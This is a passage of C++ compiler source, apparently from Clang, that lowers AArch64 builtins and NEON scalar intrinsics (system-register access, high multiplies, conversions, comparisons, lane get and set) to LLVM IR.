if (IsPointerBuiltin) {
ValueType = VoidPtrTy;
} else if (Is64Bit) {
ValueType = Int64Ty;
} else {
ValueType = Int32Ty;
}
return EmitSpecialRegisterBuiltin(*this, E, RegisterType, ValueType,
AccessKind);
}
if (BuiltinID == AArch64::BI_ReadStatusReg ||
BuiltinID == AArch64::BI_WriteStatusReg) {
LLVMContext &Context = CGM.getLLVMContext();
unsigned SysReg =
E->getArg(0)->EvaluateKnownConstInt(getContext()).getZExtValue();
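// Decompose the packed system-register encoding into the
// "op0:op1:CRn:CRm:op2" string form expected by the read/write_register
// intrinsics (op0 is always 2 or 3, hence the leading (1 << 1) | ... term).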
std::string SysRegStr;
llvm::raw_string_ostream(SysRegStr) <<
((1 << 1) | ((SysReg >> 14) & 1)) << ":" <<
((SysReg >> 11) & 7) << ":" <<
((SysReg >> 7) & 15) << ":" <<
((SysReg >> 3) & 15) << ":" <<
( SysReg & 7);
llvm::Metadata *Ops[] = { llvm::MDString::get(Context, SysRegStr) };
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Type *RegisterType = Int64Ty;
llvm::Type *Types[] = { RegisterType };
if (BuiltinID == AArch64::BI_ReadStatusReg) {
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::read_register, Types);
return Builder.CreateCall(F, Metadata);
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::write_register, Types);
llvm::Value *ArgValue = EmitScalarExpr(E->getArg(1));
return Builder.CreateCall(F, { Metadata, ArgValue });
}
if (BuiltinID == AArch64::BI_AddressOfReturnAddress) {
llvm::Function *F =
CGM.getIntrinsic(Intrinsic::addressofreturnaddress, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI__builtin_sponentry) {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sponentry, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI__mulh || BuiltinID == AArch64::BI__umulh) {
llvm::Type *ResType = ConvertType(E->getType());
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
bool IsSigned = BuiltinID == AArch64::BI__mulh;
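// Both builtins return the high 64 bits of a 64x64->128 multiply: widen the
// operands to i128, multiply, and shift the product down by 64.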
Value *LHS =
Builder.CreateIntCast(EmitScalarExpr(E->getArg(0)), Int128Ty, IsSigned);
Value *RHS =
Builder.CreateIntCast(EmitScalarExpr(E->getArg(1)), Int128Ty, IsSigned);
Value *MulResult, *HigherBits;
if (IsSigned) {
MulResult = Builder.CreateNSWMul(LHS, RHS);
HigherBits = Builder.CreateAShr(MulResult, 64);
} else {
MulResult = Builder.CreateNUWMul(LHS, RHS);
HigherBits = Builder.CreateLShr(MulResult, 64);
}
HigherBits = Builder.CreateIntCast(HigherBits, ResType, IsSigned);
return HigherBits;
}
// Handle MSVC intrinsics before argument evaluation to prevent double
// evaluation.
if (Optional<MSVCIntrin> MsvcIntId = translateAarch64ToMsvcIntrin(BuiltinID))
return EmitMSVCBuiltinExpr(*MsvcIntId, E);
// Find out if any arguments are required to be integer constant
// expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
llvm::SmallVector<Value*, 4> Ops;
Address PtrOp0 = Address::invalid();
for (unsigned i = 0, e = E->getNumArgs() - 1; i != e; i++) {
if (i == 0) {
switch (BuiltinID) {
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v:
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v:
case NEON::BI__builtin_neon_vld1_lane_v:
case NEON::BI__builtin_neon_vld1q_lane_v:
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst1_lane_v:
case NEON::BI__builtin_neon_vst1q_lane_v:
// Get the alignment for the argument in addition to the value;
// we'll use it later.
PtrOp0 = EmitPointerWithAlignment(E->getArg(0));
Ops.push_back(PtrOp0.getPointer());
continue;
}
}
if ((ICEArguments & (1 << i)) == 0) {
Ops.push_back(EmitScalarExpr(E->getArg(i)));
} else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Ops.push_back(llvm::ConstantInt::get(
getLLVMContext(),
*E->getArg(i)->getIntegerConstantExpr(getContext())));
}
}
auto SISDMap = makeArrayRef(AArch64SISDIntrinsicMap);
const ARMVectorIntrinsicInfo *Builtin = findARMVectorIntrinsicInMap(
SISDMap, BuiltinID, AArch64SISDIntrinsicsProvenSorted);
if (Builtin) {
Ops.push_back(EmitScalarExpr(E->getArg(E->getNumArgs() - 1)));
Value *Result = EmitCommonNeonSISDBuiltinExpr(*this, *Builtin, Ops, E);
assert(Result && "SISD intrinsic should have been handled");
return Result;
}
const Expr *Arg = E->getArg(E->getNumArgs()-1);
NeonTypeFlags Type(0);
if (Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(getContext()))
// Determine the type of this overloaded NEON intrinsic.
Type = NeonTypeFlags(Result->getZExtValue());
bool usgn = Type.isUnsigned();
bool quad = Type.isQuad();
// Handle non-overloaded intrinsics first.
switch (BuiltinID) {
default: break;
case NEON::BI__builtin_neon_vabsh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitNeonCall(CGM.getIntrinsic(Intrinsic::fabs, HalfTy), Ops, "vabs");
case NEON::BI__builtin_neon_vaddq_p128: {
llvm::Type *Ty = GetNeonType(this, NeonTypeFlags::Poly128);
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[0] = Builder.CreateXor(Ops[0], Ops[1]);
llvm::Type *Int128Ty = llvm::Type::getIntNTy(getLLVMContext(), 128);
return Builder.CreateBitCast(Ops[0], Int128Ty);
}
case NEON::BI__builtin_neon_vldrq_p128: {
llvm::Type *Int128Ty = llvm::Type::getIntNTy(getLLVMContext(), 128);
llvm::Type *Int128PTy = llvm::PointerType::get(Int128Ty, 0);
Value *Ptr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), Int128PTy);
return Builder.CreateAlignedLoad(Int128Ty, Ptr,
CharUnits::fromQuantity(16));
}
case NEON::BI__builtin_neon_vstrq_p128: {
llvm::Type *Int128PTy = llvm::Type::getIntNPtrTy(getLLVMContext(), 128);
Value *Ptr = Builder.CreateBitCast(Ops[0], Int128PTy);
return Builder.CreateDefaultAlignedStore(EmitScalarExpr(E->getArg(1)), Ptr);
}
case NEON::BI__builtin_neon_vcvts_f32_u32:
case NEON::BI__builtin_neon_vcvtd_f64_u64:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcvts_f32_s32:
case NEON::BI__builtin_neon_vcvtd_f64_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
bool Is64 = Ops[0]->getType()->getPrimitiveSizeInBits() == 64;
llvm::Type *InTy = Is64 ? Int64Ty : Int32Ty;
llvm::Type *FTy = Is64 ? DoubleTy : FloatTy;
Ops[0] = Builder.CreateBitCast(Ops[0], InTy);
if (usgn)
return Builder.CreateUIToFP(Ops[0], FTy);
return Builder.CreateSIToFP(Ops[0], FTy);
}
case NEON::BI__builtin_neon_vcvth_f16_u16:
case NEON::BI__builtin_neon_vcvth_f16_u32:
case NEON::BI__builtin_neon_vcvth_f16_u64:
usgn = true;
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcvth_f16_s16:
case NEON::BI__builtin_neon_vcvth_f16_s32:
case NEON::BI__builtin_neon_vcvth_f16_s64: {
Ops.push_back(EmitScalarExpr(E->getArg(0)));
llvm::Type *FTy = HalfTy;
llvm::Type *InTy;
if (Ops[0]->getType()->getPrimitiveSizeInBits() == 64)
InTy = Int64Ty;
else if (Ops[0]->getType()->getPrimitiveSizeInBits() == 32)
InTy = Int32Ty;
else
InTy = Int16Ty;
Ops[0] = Builder.CreateBitCast(Ops[0], InTy);
if (usgn)
return Builder.CreateUIToFP(Ops[0], FTy);
return Builder.CreateSIToFP(Ops[0], FTy);
}
case NEON::BI__builtin_neon_vcvtah_u16_f16:
case NEON::BI__builtin_neon_vcvtmh_u16_f16:
case NEON::BI__builtin_neon_vcvtnh_u16_f16:
case NEON::BI__builtin_neon_vcvtph_u16_f16:
case NEON::BI__builtin_neon_vcvth_u16_f16:
case NEON::BI__builtin_neon_vcvtah_s16_f16:
case NEON::BI__builtin_neon_vcvtmh_s16_f16:
case NEON::BI__builtin_neon_vcvtnh_s16_f16:
case NEON::BI__builtin_neon_vcvtph_s16_f16:
case NEON::BI__builtin_neon_vcvth_s16_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(0)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvtah_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtau; break;
case NEON::BI__builtin_neon_vcvtmh_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtmu; break;
case NEON::BI__builtin_neon_vcvtnh_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtnu; break;
case NEON::BI__builtin_neon_vcvtph_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtpu; break;
case NEON::BI__builtin_neon_vcvth_u16_f16:
Int = Intrinsic::aarch64_neon_fcvtzu; break;
case NEON::BI__builtin_neon_vcvtah_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtas; break;
case NEON::BI__builtin_neon_vcvtmh_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtms; break;
case NEON::BI__builtin_neon_vcvtnh_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtns; break;
case NEON::BI__builtin_neon_vcvtph_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtps; break;
case NEON::BI__builtin_neon_vcvth_s16_f16:
Int = Intrinsic::aarch64_neon_fcvtzs; break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvt");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcaleh_f16:
case NEON::BI__builtin_neon_vcalth_f16:
case NEON::BI__builtin_neon_vcageh_f16:
case NEON::BI__builtin_neon_vcagth_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcageh_f16:
Int = Intrinsic::aarch64_neon_facge; break;
case NEON::BI__builtin_neon_vcagth_f16:
Int = Intrinsic::aarch64_neon_facgt; break;
case NEON::BI__builtin_neon_vcaleh_f16:
Int = Intrinsic::aarch64_neon_facge; std::swap(Ops[0], Ops[1]); break;
case NEON::BI__builtin_neon_vcalth_f16:
Int = Intrinsic::aarch64_neon_facgt; std::swap(Ops[0], Ops[1]); break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "facg");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcvth_n_s16_f16:
case NEON::BI__builtin_neon_vcvth_n_u16_f16: {
unsigned Int;
llvm::Type* InTy = Int32Ty;
llvm::Type* FTy = HalfTy;
llvm::Type *Tys[2] = {InTy, FTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvth_n_s16_f16:
Int = Intrinsic::aarch64_neon_vcvtfp2fxs; break;
case NEON::BI__builtin_neon_vcvth_n_u16_f16:
Int = Intrinsic::aarch64_neon_vcvtfp2fxu; break;
}
Ops[0] = EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvth_n");
return Builder.CreateTrunc(Ops[0], Int16Ty);
}
case NEON::BI__builtin_neon_vcvth_n_f16_s16:
case NEON::BI__builtin_neon_vcvth_n_f16_u16: {
unsigned Int;
llvm::Type* FTy = HalfTy;
llvm::Type* InTy = Int32Ty;
llvm::Type *Tys[2] = {FTy, InTy};
Ops.push_back(EmitScalarExpr(E->getArg(1)));
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vcvth_n_f16_s16:
Int = Intrinsic::aarch64_neon_vcvtfxs2fp;
Ops[0] = Builder.CreateSExt(Ops[0], InTy, "sext");
break;
case NEON::BI__builtin_neon_vcvth_n_f16_u16:
Int = Intrinsic::aarch64_neon_vcvtfxu2fp;
Ops[0] = Builder.CreateZExt(Ops[0], InTy);
break;
}
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "fcvth_n");
}
case NEON::BI__builtin_neon_vpaddd_s64: {
auto *Ty = llvm::FixedVectorType::get(Int64Ty, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2i64, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2i64");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2i64 into a scalar i64.
return Builder.CreateAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vpaddd_f64: {
auto *Ty = llvm::FixedVectorType::get(DoubleTy, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2f64, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2f64");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2f64 into a scalar f64.
return Builder.CreateFAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vpadds_f32: {
auto *Ty = llvm::FixedVectorType::get(FloatTy, 2);
Value *Vec = EmitScalarExpr(E->getArg(0));
// The vector is v2f32, so make sure it's bitcast to that.
Vec = Builder.CreateBitCast(Vec, Ty, "v2f32");
llvm::Value *Idx0 = llvm::ConstantInt::get(SizeTy, 0);
llvm::Value *Idx1 = llvm::ConstantInt::get(SizeTy, 1);
Value *Op0 = Builder.CreateExtractElement(Vec, Idx0, "lane0");
Value *Op1 = Builder.CreateExtractElement(Vec, Idx1, "lane1");
// Pairwise addition of a v2f32 into a scalar f32.
return Builder.CreateFAdd(Op0, Op1, "vpaddd");
}
case NEON::BI__builtin_neon_vceqzd_s64:
case NEON::BI__builtin_neon_vceqzd_f64:
case NEON::BI__builtin_neon_vceqzs_f32:
case NEON::BI__builtin_neon_vceqzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OEQ, ICmpInst::ICMP_EQ, "vceqz");
case NEON::BI__builtin_neon_vcgezd_s64:
case NEON::BI__builtin_neon_vcgezd_f64:
case NEON::BI__builtin_neon_vcgezs_f32:
case NEON::BI__builtin_neon_vcgezh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OGE, ICmpInst::ICMP_SGE, "vcgez");
case NEON::BI__builtin_neon_vclezd_s64:
case NEON::BI__builtin_neon_vclezd_f64:
case NEON::BI__builtin_neon_vclezs_f32:
case NEON::BI__builtin_neon_vclezh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OLE, ICmpInst::ICMP_SLE, "vclez");
case NEON::BI__builtin_neon_vcgtzd_s64:
case NEON::BI__builtin_neon_vcgtzd_f64:
case NEON::BI__builtin_neon_vcgtzs_f32:
case NEON::BI__builtin_neon_vcgtzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OGT, ICmpInst::ICMP_SGT, "vcgtz");
case NEON::BI__builtin_neon_vcltzd_s64:
case NEON::BI__builtin_neon_vcltzd_f64:
case NEON::BI__builtin_neon_vcltzs_f32:
case NEON::BI__builtin_neon_vcltzh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(0)));
return EmitAArch64CompareBuiltinExpr(
Ops[0], ConvertType(E->getCallReturnType(getContext())),
ICmpInst::FCMP_OLT, ICmpInst::ICMP_SLT, "vcltz");
case NEON::BI__builtin_neon_vceqzd_u64: {
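    // Note: like the other scalar compares, this returns an all-ones /
    // all-zeros mask rather than a bool, hence the icmp followed by a sext.
    // E.g. vceqzd_u64(0) yields 0xFFFFFFFFFFFFFFFF; vceqzd_u64(1) yields 0.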
Ops.push_back(EmitScalarExpr(E->getArg(0)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[0] =
Builder.CreateICmpEQ(Ops[0], llvm::Constant::getNullValue(Int64Ty));
return Builder.CreateSExt(Ops[0], Int64Ty, "vceqzd");
}
case NEON::BI__builtin_neon_vceqd_f64:
case NEON::BI__builtin_neon_vcled_f64:
case NEON::BI__builtin_neon_vcltd_f64:
case NEON::BI__builtin_neon_vcged_f64:
case NEON::BI__builtin_neon_vcgtd_f64: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqd_f64: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcled_f64: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vcltd_f64: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcged_f64: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgtd_f64: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], DoubleTy);
Ops[1] = Builder.CreateBitCast(Ops[1], DoubleTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int64Ty, "vcmpd");
}
case NEON::BI__builtin_neon_vceqs_f32:
case NEON::BI__builtin_neon_vcles_f32:
case NEON::BI__builtin_neon_vclts_f32:
case NEON::BI__builtin_neon_vcges_f32:
case NEON::BI__builtin_neon_vcgts_f32: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqs_f32: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcles_f32: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vclts_f32: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcges_f32: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgts_f32: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], FloatTy);
Ops[1] = Builder.CreateBitCast(Ops[1], FloatTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
    return Builder.CreateSExt(Ops[0], Int32Ty, "vcmps");
}
case NEON::BI__builtin_neon_vceqh_f16:
case NEON::BI__builtin_neon_vcleh_f16:
case NEON::BI__builtin_neon_vclth_f16:
case NEON::BI__builtin_neon_vcgeh_f16:
case NEON::BI__builtin_neon_vcgth_f16: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqh_f16: P = llvm::FCmpInst::FCMP_OEQ; break;
case NEON::BI__builtin_neon_vcleh_f16: P = llvm::FCmpInst::FCMP_OLE; break;
case NEON::BI__builtin_neon_vclth_f16: P = llvm::FCmpInst::FCMP_OLT; break;
case NEON::BI__builtin_neon_vcgeh_f16: P = llvm::FCmpInst::FCMP_OGE; break;
case NEON::BI__builtin_neon_vcgth_f16: P = llvm::FCmpInst::FCMP_OGT; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], HalfTy);
Ops[1] = Builder.CreateBitCast(Ops[1], HalfTy);
Ops[0] = Builder.CreateFCmp(P, Ops[0], Ops[1]);
    return Builder.CreateSExt(Ops[0], Int16Ty, "vcmph");
}
case NEON::BI__builtin_neon_vceqd_s64:
case NEON::BI__builtin_neon_vceqd_u64:
case NEON::BI__builtin_neon_vcgtd_s64:
case NEON::BI__builtin_neon_vcgtd_u64:
case NEON::BI__builtin_neon_vcltd_s64:
case NEON::BI__builtin_neon_vcltd_u64:
case NEON::BI__builtin_neon_vcged_u64:
case NEON::BI__builtin_neon_vcged_s64:
case NEON::BI__builtin_neon_vcled_u64:
case NEON::BI__builtin_neon_vcled_s64: {
llvm::CmpInst::Predicate P;
switch (BuiltinID) {
default: llvm_unreachable("missing builtin ID in switch!");
case NEON::BI__builtin_neon_vceqd_s64:
    case NEON::BI__builtin_neon_vceqd_u64: P = llvm::ICmpInst::ICMP_EQ; break;
    case NEON::BI__builtin_neon_vcgtd_s64: P = llvm::ICmpInst::ICMP_SGT; break;
    case NEON::BI__builtin_neon_vcgtd_u64: P = llvm::ICmpInst::ICMP_UGT; break;
    case NEON::BI__builtin_neon_vcltd_s64: P = llvm::ICmpInst::ICMP_SLT; break;
    case NEON::BI__builtin_neon_vcltd_u64: P = llvm::ICmpInst::ICMP_ULT; break;
    case NEON::BI__builtin_neon_vcged_u64: P = llvm::ICmpInst::ICMP_UGE; break;
    case NEON::BI__builtin_neon_vcged_s64: P = llvm::ICmpInst::ICMP_SGE; break;
    case NEON::BI__builtin_neon_vcled_u64: P = llvm::ICmpInst::ICMP_ULE; break;
    case NEON::BI__builtin_neon_vcled_s64: P = llvm::ICmpInst::ICMP_SLE; break;
}
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops[0] = Builder.CreateICmp(P, Ops[0], Ops[1]);
return Builder.CreateSExt(Ops[0], Int64Ty, "vceqd");
}
case NEON::BI__builtin_neon_vtstd_s64:
case NEON::BI__builtin_neon_vtstd_u64: {
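    // Note: vtst is a bit test: the result is all-ones if (a & b) has any
    // bit set and all-zeros otherwise. E.g. vtstd_u64(0b1010, 0b0101) == 0,
    // while vtstd_u64(0b1010, 0b0010) == ~0ULL.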
Ops.push_back(EmitScalarExpr(E->getArg(1)));
Ops[0] = Builder.CreateBitCast(Ops[0], Int64Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Int64Ty);
Ops[0] = Builder.CreateAnd(Ops[0], Ops[1]);
Ops[0] = Builder.CreateICmp(ICmpInst::ICMP_NE, Ops[0],
llvm::Constant::getNullValue(Int64Ty));
return Builder.CreateSExt(Ops[0], Int64Ty, "vtstd");
}
case NEON::BI__builtin_neon_vset_lane_i8:
case NEON::BI__builtin_neon_vset_lane_i16:
case NEON::BI__builtin_neon_vset_lane_i32:
case NEON::BI__builtin_neon_vset_lane_i64:
case NEON::BI__builtin_neon_vset_lane_bf16:
case NEON::BI__builtin_neon_vset_lane_f32:
case NEON::BI__builtin_neon_vsetq_lane_i8:
case NEON::BI__builtin_neon_vsetq_lane_i16:
case NEON::BI__builtin_neon_vsetq_lane_i32:
case NEON::BI__builtin_neon_vsetq_lane_i64:
case NEON::BI__builtin_neon_vsetq_lane_bf16:
case NEON::BI__builtin_neon_vsetq_lane_f32:
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vset_lane_f64:
// The vector type needs a cast for the v1f64 variant.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(DoubleTy, 1));
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vsetq_lane_f64:
// The vector type needs a cast for the v2f64 variant.
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(DoubleTy, 2));
Ops.push_back(EmitScalarExpr(E->getArg(2)));
return Builder.CreateInsertElement(Ops[1], Ops[0], Ops[2], "vset_lane");
case NEON::BI__builtin_neon_vget_lane_i8:
case NEON::BI__builtin_neon_vdupb_lane_i8:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int8Ty, 8));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_i8:
case NEON::BI__builtin_neon_vdupb_laneq_i8:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int8Ty, 16));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i16:
case NEON::BI__builtin_neon_vduph_lane_i16:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int16Ty, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_i16:
case NEON::BI__builtin_neon_vduph_laneq_i16:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int16Ty, 8));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i32:
case NEON::BI__builtin_neon_vdups_lane_i32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vdups_lane_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vdups_lane");
case NEON::BI__builtin_neon_vgetq_lane_i32:
case NEON::BI__builtin_neon_vdups_laneq_i32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int32Ty, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_i64:
case NEON::BI__builtin_neon_vdupd_lane_i64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vdupd_lane_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vdupd_lane");
case NEON::BI__builtin_neon_vgetq_lane_i64:
case NEON::BI__builtin_neon_vdupd_laneq_i64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int64Ty, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vget_lane_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vget_lane_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 1));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vget_lane");
case NEON::BI__builtin_neon_vgetq_lane_f32:
case NEON::BI__builtin_neon_vdups_laneq_f32:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(FloatTy, 4));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vgetq_lane_f64:
case NEON::BI__builtin_neon_vdupd_laneq_f64:
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(DoubleTy, 2));
return Builder.CreateExtractElement(Ops[0], EmitScalarExpr(E->getArg(1)),
"vgetq_lane");
case NEON::BI__builtin_neon_vaddh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFAdd(Ops[0], Ops[1], "vaddh");
case NEON::BI__builtin_neon_vsubh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFSub(Ops[0], Ops[1], "vsubh");
case NEON::BI__builtin_neon_vmulh_f16:
Ops.push_back(EmitScalarExpr(E->getArg(1)));
return Builder.CreateFMul(Ops[0], Ops[1], "vmulh");
